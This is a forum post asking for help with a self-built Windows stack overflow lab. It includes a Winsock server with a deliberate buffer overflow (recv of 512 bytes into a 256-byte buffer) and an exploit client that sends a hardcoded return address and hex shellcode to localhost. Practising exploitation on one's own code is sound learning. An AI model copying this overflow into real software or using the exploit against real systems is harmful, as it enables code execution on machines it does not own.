Windows Stack Based Overflow, Confusing

[Tonto]

Okay. Here's the real question. Is Winsock smarter than me? Lots of evidence points to: yes. For example, here is my program being stupid.

Code:

#include <winsock2.h>
#include <stdio.h>

int main(int argc, char ** argv)
{
	char         buf[256];
	WSADATA      wsaData;
	SOCKET       hSock;
	SOCKET       hClient;
	SOCKADDR_IN  sIn;
	

	WSAStartup(MAKEWORD(2, 2), &wsaData);

	hSock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

	sIn.sin_family = AF_INET;
	sIn.sin_addr.s_addr = INADDR_ANY;
	sIn.sin_port = htons(1337);

	bind(hSock, (sockaddr *) &sIn, sizeof(SOCKADDR_IN));
	listen(hSock, 1);

	hClient = accept(hSock, NULL, NULL);
	if(hClient != INVALID_SOCKET)
	{
		printf("client accepted\n");
		int  ret;
		while(ret = recv(hClient, buf, 512, 0))
		{
			printf("recv'd content: %d\n", ret);
			if(ret == 0)
				break;
			else if(ret == SOCKET_ERROR)
			{
				printf("%d\n", WSAGetLastError());
				break;
			}
			else
				buf[ret] = 0;

		}
	}
	WSACleanup();
	return 0;
}

And when I try to overflow it with an exploit program, I get some funny behavior. I am normally able to get it to work like, once, and then recv consistently returns 10014 after that. Which is;

WSAEFAULT: 10014 - Bad address. The system detected an invalid pointer address in attempting to use a pointer argument of a call. This error occurs if an application passes an invalid pointer value, or if the length of the buffer is too small. For instance, if the length of an argument, which is a sockaddr structure, is smaller than the sizeof(sockaddr).

Here is the exact exploit program I used

Code:

#include <windows.h>
#include <stdio.h>

char shellcode[] = 
	"\x31\xD2\x52\x52\x52\x52\xB8\xEA\x04\xD8\x77\xFF"
	"\xD0\x31\xC0\x50\xB8\xA2\xCA\x81\x7C\xFF\xD0";


int main()
{
	char buffer[300];
	for(int i = 0; i < sizeof(buffer); i++)
		buffer[i] = 'X';

	*(int *) (buffer + 260) = 0x7C82385D;
	memcpy(buffer + 264, shellcode, strlen(shellcode));

	WSADATA wsaData;
	WSAStartup(MAKEWORD(2, 2), &wsaData);
	SOCKET hSock;


	hSock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
	if(hSock == INVALID_SOCKET)
		return 0;

	sockaddr_in clientService;

	clientService.sin_family = AF_INET;
	clientService.sin_addr.s_addr = inet_addr("127.0.0.1");
	clientService.sin_port = htons(1337);

	if(connect(hSock, (sockaddr *) &clientService, sizeof(clientService)) == SOCKET_ERROR) 
	{
		printf("Failed\n");
		WSACleanup();
		return 0;
	}

	printf("%d\n", send(hSock, buffer, sizeof(buffer), 0));
	closesocket(hSock);
	WSACleanup();
	return 0;
}

How? When? Where? Who? Why?